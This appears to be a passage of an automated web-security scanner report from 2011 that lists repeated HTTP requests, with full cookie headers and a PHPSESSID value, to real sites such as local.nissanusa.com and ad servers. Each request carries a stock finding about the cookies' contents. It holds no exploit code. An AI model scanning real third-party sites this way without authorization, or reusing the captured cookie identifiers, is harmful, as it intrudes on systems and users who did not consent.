GET /miami-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /milwaukee-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /minneapolis-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /nashville-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /new-orleans-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /new-york-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /norfolk-portsmouth-newport-news-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /oklahoma-city-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /orlando-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /philadelphia-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /phoenix-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pittsburgh-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /portland-or-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /providence-new-bedford-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sacramento-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /salt-lake-city-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /san-antonio-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /san-diego-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /san-francisco-oakland-san-jose-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /seattle-tacoma-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /st-louis-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /tampa-st-petersburg-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /washington-dc-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wilkes-barre-scranton-pa-area HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /zip.aspx?regionalZipCode=null&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=39942763.226884546\ HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /w/click.here?cid=276818;mid=522556;m=1;sid=54393;c=0;tp=5;forced_click=\ HTTP/1.1 Host: media.fastclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; zru=1|:1294800534|; adv_ic=BxQAAAAcbUNNIAYGAAFJAACZUCAHIAtAAAIes0CAFwdDAACpSAAAYEAUIAABU2jgAS8BP17gAS8CvQ0/4AAvBBtZAAB2ICtAAAFcZ+ABLwDF4AIvAZph4AEXALDgAhcBpmDgARcBAlvgAV8B0FzgARcA/CCPwKcBCFfgARcAviBHAANAdCAAAXhL4AEXAHngAkcBXNWg1yDvAWQ44AFHAIvAvyAXAc1P4AFHAFXgAhcBR1PgAS8AJuACFwAPIHfAjwAD4AIXABjgAhcB/gyhHyBfAbda4AEvANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwHVXOABRwCr4AIXAXlHwBcBAAA=; vt=10070:256698:477674:54816:0:1295925050:3|10991:274413:511325:54393:0:1296263251:0|; pluto=517004695355|v1; pjw=BBQAAAACIAMDClZDTSAGAQABIAMCYEUEYBMC/fcHIA2AEwEeVOABHwBfoB8A/OACHwEpU+ABHwLmLwRgRwFfzeABPwE7UeABHwRORwQAAyBXAej74AEfAUVQ4AEfBDzSAwAEIB8B+hHgAR8BbkzgAR8BLjeAXwEq3uABHwF4S+ABHwBQIJ9AxwDX4AKfAX9K4AEfAYdBgB8B9fDgAT8BlEjgAR8BWEOAHwGa9eABHwGoRuABHwFSOYAfATz54AEfARxt4AEfAiTpA2E/AMegXwAGIMsBU2jgAR8A7aEfAF2hH0AfAVxn4AEfAFegvwDUoL9AHwGaYeABHwBfoJ8AmKCfQB8BpmDgAR8AbKCfAEugn0AfAc9c4AEfAS8sgL8BS8WAv0AfAdpb4AEfAJGhHwHu8uABHwEIV+ABHwEyRIG/AFLgAn8AOuEC3wHGLoBfAXHM4AE/4QOfASk/gB8BDu3AHwEAAA==;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /w/get.media?sid=54393&tp=5&d=j&t=n HTTP/1.1 Host: media.fastclick.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; vt=10070:256698:477674:54816:0:1295925050:3|10358:244443:513092:57358:0:1296072859:0|; pjw=BAMAAAACIAMDXNVATSAGCAABAQAA/EgCACAG4AAAAAMgCQHPpqAfICwAwCAP4AMfAAYgDwDHwB8gGATrdAIAUyATwAADBgAAAA==; adv_ic=ByoAAABc1UBNIAYGAAFJAABkOCAHIAtAAAGbgOABFwGpSOABFwEes6AXAEOAFwBgQCwgAAKSDT/gAEcBsF3gAS8AvcAXIC8EG1kAAHYgK0AAAI7AFyB3AJAgF8B3AIvgAhcEzU8AAANALCAAAHfgAhcAJyBpwC8AcuACFwD84AKnAG3gAhcBdlzgAS8AaOACFwDkIHvARwBi4AIXATte4AEXAF3gAhcBLlHgARcAWuACFwEbWOABFwBV4AIXAUdT4AEXAFDgAhcAo+ECHwBG4AIXAObgAhcAReACFwElW+ABRwA84AIXAPvgAl8AN+ACFwEGTOABLwAz4AIXAdZL4AEXAC/gAhcAnuACXwAu4AIXAB/hAgcAKuACFwA34AKnACbgAhcAD+ACLwAg4AIXAALgAl8AHOACFwFVWuABjwAW4AIXAQpQ4AEXAAPgAhcAGOACXwH+DOIBbwC34AJHANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwDV4gInAM/gAhcAZeMCFwDI4AIXAR9W4AGnAMTgAhcAFeACXwC/4AIXAD/gAhcAsOACFwHbV+ABRwCr4AIXAXlH4AEXAKjgAhcAoOACRwCA4AIXAMwiDwACIytAAAI7Pz4jJSA/IuNDdwCRIAsDAAAAAA==; pluto=517004695355|v1
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2/B3DM/DLX/1@x96 HTTP/1.1 Host: mig.nexac.com Proxy-Connection: keep-alive Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: na_tc=Y; OAX=rcHW800+KPMAAfCd
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:14:46 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 1391 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/
<script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: mx.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: mx.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /n/49881/49889/www.247realmedia.com/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&pq=%2fEN%2dUS%2f&1pixgif&referer= HTTP/1.1 Host: na.link.decdna.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Fri, 28 Jan 2011 14:16:08 GMT Server: Apache/1.3.33 (Unix) Pragma: no-cache Expires: Fri, 28 Jan 2011 14:16:08 GMT location: http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&0&pq=%2fEN%2dUS%2f&1pixgif&referer=&bounced Set-Cookie: %2edecdna%2enet/%2fn%2f49881/2/e=1296224168/49881/49889/0/0//0///0/0/0/0///0/0//0//0/0; expires=Sun, 27-Feb-2011 14:16:08 GMT; path=/n/49881; domain=.decdna.net; P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT" Set-Cookie: id=9286424825562137129; expires=Sat, 28-Jan-2012 14:16:08 GMT; path=/; domain=.decdna.net; Set-Cookie: name=9286424825511805852; path=/; domain=.decdna.net; Content-Length: 0 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
